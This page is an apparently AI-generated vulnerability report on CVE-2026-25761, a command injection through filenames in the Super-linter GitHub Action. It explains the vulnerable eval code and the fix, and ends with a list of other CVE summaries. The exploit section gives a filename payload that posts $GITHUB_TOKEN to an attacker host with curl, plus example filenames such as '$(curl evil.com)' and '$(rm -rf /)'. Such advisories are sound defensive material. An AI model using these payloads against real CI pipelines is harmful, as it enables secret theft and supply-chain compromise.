CVEReports
CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

Product

  • Home
  • Sitemap
  • RSS Feed

Company

  • About
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



CVE-2026-25761

Shell Hell in Super-Linter: CVE-2026-25761

Amit Schendel
Amit Schendel
Senior Security Researcher

Feb 9, 2026·6 min read·22 visits

Executive Summary (TL;DR)

A critical OS Command Injection vulnerability in Super-linter allows attackers to execute code via malicious filenames in Pull Requests. Upgrading to version 8.3.1 is mandatory.

Super-linter, the popular 'one-linter-to-rule-them-all' GitHub Action, contained a critical Command Injection vulnerability (CVE-2026-25761) in versions prior to 8.3.1. The flaw resided in the orchestration scripts responsible for discovering changed files in a Pull Request. By crafting a malicious filename containing shell metacharacters—specifically command substitutions like `$(...)`—an attacker could trick the runner into executing arbitrary code. This allows for exfiltration of secrets, modification of the repository, or lateral movement within the CI/CD pipeline.

The Hook: The Linter That Needed Linting

Super-linter is the Swiss Army knife of CI/CD. It bundles dozens of linters—Python, JavaScript, Go, Terraform, you name it—into a single, massive Docker container. It’s a beast of a tool that developers drop into their workflows to ensure code quality without configuring fifty different plugins. But under the hood, Super-linter is essentially a massive orchestration engine held together by the digital equivalent of duct tape: Bash scripts.

Bash is powerful, but it is notoriously unforgiving when it comes to input sanitization. In the UNIX philosophy, a filename is just a stream of bytes. It can contain spaces, newlines, and yes, shell metacharacters like $, ;, and backticks. The only forbidden characters are null bytes and forward slashes.

CVE-2026-25761 is a classic story of what happens when a developer assumes a filename is just text, rather than a potential payload. By failing to sanitize file paths before passing them to an eval statement, Super-linter inadvertently turned every Pull Request into a potential Remote Code Execution (RCE) vector. It’s ironic: the tool designed to catch bad code was itself running some of the most dangerous patterns in the shell scripting handbook.

The Flaw: Trusting the Untrustable

The vulnerability lived in the file discovery logic. When Super-linter runs on a Pull Request, it doesn't want to lint the entire repository—that would take forever. Instead, it calculates the git diff to find only the files that changed. It grabs these filenames and builds a list to pass to the various linters.

The core issue was how this list was constructed. The script used a combination of git ls-tree, xargs, and the dreaded eval command to process the file list. The logic effectively said: "Take this list of files, and for each one, echo its full path."

Here is where it went wrong: The script used xargs to spawn a subshell (sh -c) to handle the echoing. Because the filename was injected directly into the command string of that subshell without proper escaping, any shell syntax inside the filename would be interpreted by the subshell, not treated as a string literal. If I name a file $(id).js, the shell sees a command to execute id, not a file named $(id).js. This is textbook command injection via filename expansion.

The Code: Eval is Evil

Let's look at the smoking gun. This is a snippet from lib/functions/buildFileList.sh before the patch. Notice the use of eval wrapping a command string that includes xargs and sh -c.

The Vulnerable Code:

# % is the filename from git ls-tree
DIFF_GIT_VALIDATE_ALL_CODEBASE="git -C \"${GITHUB_WORKSPACE}\" ls-tree -r --name-only HEAD | xargs -I % sh -c \"echo ${GITHUB_WORKSPACE}/%\" 2>&1"
 
# The Sink: executing the string as code
eval "${DIFF_GIT_VALIDATE_ALL_CODEBASE}"

When xargs encounters a file named $(curl evil.com), it constructs a command line roughly looking like sh -c "echo .../$(curl evil.com)". The shell parses the $() and executes curl immediately.

The Fix (v8.3.1):

The maintainers removed the Rube Goldberg machine of xargs and eval entirely. They switched to sed for string manipulation (prefixing the path) and mapfile to load the results safely into an array.

local LIST_OF_FILES_IN_REPO
if ! LIST_OF_FILES_IN_REPO=$(
  set -o pipefail
  # Use sed to prepend the workspace path safely
  git -C "${GITHUB_WORKSPACE}" ls-tree -r --name-only HEAD | sed "s|^|${GITHUB_WORKSPACE}/|"
); then
  fatal "Failed..."
fi
 
# Load into array without execution
mapfile -t RAW_FILE_ARRAY <<<"${LIST_OF_FILES_IN_REPO}"

By using sed, the filename is treated as a stream of text. sed doesn't care if your file is named $(rm -rf /); it just prepends the path and moves on.

The Exploit: Weaponizing Filenames

Exploiting this is trivially easy and requires zero authentication if the repository accepts Pull Requests from forks (which most open-source projects do).

Step 1: The Payload

We need a filename that constitutes a valid shell command. Since slashes / are forbidden in filenames, we can't easily execute complex paths, but we can rely on PATH or use command substitution.

# Create a malicious file locally
touch 'share/$(curl -X POST -d @- attacker.com_keys <<< $GITHUB_TOKEN).js'

Step 2: The Trap

Commit this file and push it to a fork. Open a Pull Request against the victim repository. This triggers the GitHub Action.

Step 3: Execution

  1. The GitHub Runner checks out the PR code.
  2. Super-linter starts up and runs buildFileList.sh.
  3. git ls-tree lists our malicious file.
  4. The vulnerable eval line processes the name.
  5. The shell sees $GITHUB_TOKEN, expands it (since it's an environment variable in the runner), and curl exfiltrates it to our listener.

> [!WARNING] > This attack is "blind." You might not see the output in the logs if the command fails or if the script crashes afterwards. However, out-of-band interaction (DNS/HTTP) confirms execution immediately.

The Impact: Your CI is My CI

Why should you panic? Because the CI runner is the soft underbelly of modern DevSecOps. If I control the runner, I control the repo.

Credential Theft: The most immediate impact is stealing the GITHUB_TOKEN or other secrets exposed as environment variables (AWS_ACCESS_KEY_ID, NPM_TOKEN, etc.).

Supply Chain Poisoning: With a write-capable token, I could push a commit to the main branch (if branch protections are weak) or modify release assets. I could effectively backdoor your software by modifying the build process from the inside.

Lateral Movement: If you run this on self-hosted runners inside your corporate VPC, I now have a shell inside your internal network. I can scan for internal services, databases, or other unprotected infrastructure that the runner has access to.

The Fix: Sed to the Rescue

The fix is simple: Upgrade.

If you are using super-linter, pin your workflow to v8.3.1 or later. Better yet, pin to the commit hash to prevent supply chain attacks against the action itself.

- name: Super-linter
  uses: super-linter/super-linter@v8.3.1
  # OR
  uses: super-linter/super-linter@d29d0d4ffb9e0d5f71026f616ba31b1228b772fa

For developers writing Bash scripts in CI: Stop using eval. If you find yourself writing eval to process a string, you are likely doing it wrong. Use arrays (declare -a), use read or mapfile, and quote your variables ("$VAR") religiously. Treat filenames as hostile user input, because in the world of open source, they absolutely are.

Official Patches

Super-linterRelease notes for v8.3.1 containing the security fix

Fix Analysis (1)

Technical Appendix

CVSS Score
8.8/ 10
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Affected Systems

GitHub Actions RunnersSuper-linter container environment

Affected Versions Detail

Product
Affected Versions
Fixed Version
super-linter/super-linter
super-linter
>= 6.0.0, < 8.3.18.3.1
AttributeDetail
CWE IDCWE-77 (Improper Neutralization of Special Elements used in a Command)
Attack VectorNetwork (via Pull Request)
CVSS Score8.8 (High)
ImpactRemote Code Execution (RCE) / Secret Exfiltration
Exploit StatusPoC Available (Trivial to construct)
Affected Versions>= 6.0.0, < 8.3.1

MITRE ATT&CK Mapping

T1059.004Command and Scripting Interpreter: Unix Shell
Execution
T1203Exploitation for Client Execution
Execution
T1566.001Phishing: Spearphishing Attachment
Initial Access
CWE-77
Improper Neutralization of Special Elements used in a Command ('Command Injection')

The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.

Known Exploits & Detection

Theoretical PoCCreating a file named '$(command).ext' triggers execution during file discovery.

Vulnerability Timeline

Patch Developed and Released (v8.3.1)
2025-12-15
CVE Published
2026-02-09

References & Sources

  • [1]GHSA Advisory
  • [2]Fix Commit

Attack Flow Diagram

Press enter or space to select a node. You can then use the arrow keys to move the node around. Press delete to remove it and escape to cancel.
Press enter or space to select an edge. You can then press delete to remove it or escape to cancel.

More Reports

•13 minutes ago•CVE-2026-48861
2.1

CVE-2026-48861: HTTP Request Splitting and Smuggling via Method Parameter CRLF Injection in Elixir Mint

CVE-2026-48861 is a client-side HTTP request-line CRLF (Carriage Return Line Feed) injection vulnerability in the popular Elixir HTTP client library, Mint. The vulnerability permits HTTP Request Splitting and HTTP Request Smuggling when an application forwards untrusted, attacker-controlled inputs to Mint's HTTP client requests as either the HTTP request method or target. By embedding CRLF characters within these parameters, an attacker can terminate the request line prematurely, inject malicious headers, or pipeline entirely independent requests. These smuggled requests are then processed by upstream or downstream proxy servers as separate HTTP queries on the same TCP connection. While Mint version 1.7.0 introduced target validation to secure the request target, the HTTP request method parameter remained completely unvalidated. This flaw allows attackers to bypass routing filters, access restricted internal APIs, or poison HTTP caches under default configurations.

Amit Schendel
Amit Schendel
1 views•7 min read
•43 minutes ago•CVE-2026-49753
6.3

CVE-2026-49753: HTTP Request/Response Smuggling via Inconsistent Content-Length Parsing in Elixir Mint Client

An Inconsistent Interpretation of HTTP Requests (HTTP Request/Response Smuggling) vulnerability in the Elixir Mint HTTP client allows attacker-controlled HTTP/1 servers to desynchronize response framing on shared connections due to over-lenient parsing of sign-prefixed Content-Length headers.

Amit Schendel
Amit Schendel
4 views•6 min read
•about 1 hour ago•CVE-2026-49754
8.2

CVE-2026-49754: Denial of Service via Unbounded HTTP/2 CONTINUATION Frame Accumulation in Elixir Mint

An allocation of resources without limits or throttling vulnerability in Elixir Mint allows an attacker-controlled HTTP/2 server to exhaust memory in a Mint client. The vulnerability is exploited by sending a HEADERS frame without the END_HEADERS flag followed by an infinite stream of CONTINUATION frames. Because the client lacks limits on the incoming header-block accumulator, the client continuously consumes memory until an out-of-memory crash occurs.

Amit Schendel
Amit Schendel
5 views•6 min read
•about 2 hours ago•CVE-2026-48596
2.1

CVE-2026-48596: Improper Neutralization of CRLF Sequences in Elixir Tesla Multipart HTTP Client

CVE-2026-48596 is an Improper Neutralization of CRLF Sequences in HTTP Headers (HTTP Request/Response Splitting, CWE-113) in the Elixir Tesla HTTP client. The flaw resides in how multipart content-type parameters are joined and serialized, enabling attackers to inject arbitrary headers or split HTTP requests when applications pass untrusted inputs to the parameters of multipart uploads.

Alon Barad
Alon Barad
4 views•6 min read
•about 2 hours ago•CVE-2026-48594
8.2

CVE-2026-48594: Decompression Bomb Denial of Service in Elixir Tesla HTTP Client

An improper handling of highly compressed data (decompression bomb) vulnerability exists in the Elixir Tesla HTTP client when utilizing response decompression middlewares. By serving highly compressed responses or stacked content-encoding headers, a malicious server can cause arbitrary heap exhaustion, leading to a denial of service (DoS) crash in the BEAM virtual machine.

Amit Schendel
Amit Schendel
4 views•6 min read
•about 3 hours ago•CVE-2026-48595
8.2

CVE-2026-48595: Cross-Origin Credential Leakage in Elixir Tesla Client via Case-Sensitive Redirect Filter Bypass

A high-severity security vulnerability in Elixir's Tesla HTTP client library (CVE-2026-48595) allows unauthenticated remote attackers to harvest sensitive credentials, including Authorization headers and cookies. The flaw resides in the 'Tesla.Middleware.FollowRedirects' component, which performs case-sensitive lookups when stripping credentials during cross-origin redirects. Because HTTP headers are case-insensitive by RFC specifications, standard canonical casing (e.g., 'Authorization') bypasses the lowercase-only blocklist, leaking tokens to untrusted external redirect destinations.

Alon Barad
Alon Barad
4 views•5 min read